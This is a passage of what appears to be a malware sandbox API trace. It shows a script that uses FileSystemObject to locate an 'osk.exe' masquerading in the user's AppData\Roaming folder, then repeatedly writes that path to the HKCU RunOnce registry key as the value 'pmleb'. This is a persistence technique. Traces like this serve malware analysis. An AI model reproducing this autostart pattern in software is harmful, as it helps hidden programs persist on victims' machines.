riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.287] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0079.287] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.287] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.287] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.287] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.287] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.287] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.287] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.287] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.288] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.288] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.288] RegCloseKey (hKey=0x280) returned 0x0 [0079.288] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.288] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.288] SetTimer (hWnd=0x20280, nIDEvent=0x2031, uElapse=0xa, lpTimerFunc=0x0) returned 0x2031 [0079.288] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.300] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.300] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.300] KillTimer (hWnd=0x20280, uIDEvent=0x2031) returned 1 [0079.301] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.301] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.301] IUnknown:Release (This=0x787518) returned 0x1 [0079.301] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.301] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.301] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.301] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.301] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.302] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.302] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.302] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 [0079.302] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.302] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x33 [0079.302] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.303] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 [0079.303] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.303] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.303] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.303] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.303] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.303] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.303] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.303] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.304] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.304] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.304] RegCloseKey (hKey=0x280) returned 0x0 [0079.304] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.304] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.304] SetTimer (hWnd=0x20280, nIDEvent=0x2032, uElapse=0xa, lpTimerFunc=0x0) returned 0x2032 [0079.304] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.316] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.316] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.316] KillTimer (hWnd=0x20280, uIDEvent=0x2032) returned 1 [0079.316] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.316] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.317] IUnknown:Release (This=0x787518) returned 0x1 [0079.317] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.317] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.317] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.317] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.317] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.318] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0079.318] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.318] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x34 [0079.318] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.319] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0079.319] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.319] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.319] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.319] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.319] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.319] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.319] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.319] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.319] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.320] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.320] RegCloseKey (hKey=0x280) returned 0x0 [0079.320] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.320] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.320] SetTimer (hWnd=0x20280, nIDEvent=0x2033, uElapse=0xa, lpTimerFunc=0x0) returned 0x2033 [0079.320] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.331] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.331] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.332] KillTimer (hWnd=0x20280, uIDEvent=0x2033) returned 1 [0079.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.332] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.332] IUnknown:Release (This=0x787518) returned 0x1 [0079.332] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.332] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.332] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.333] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.333] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.333] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0079.333] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, 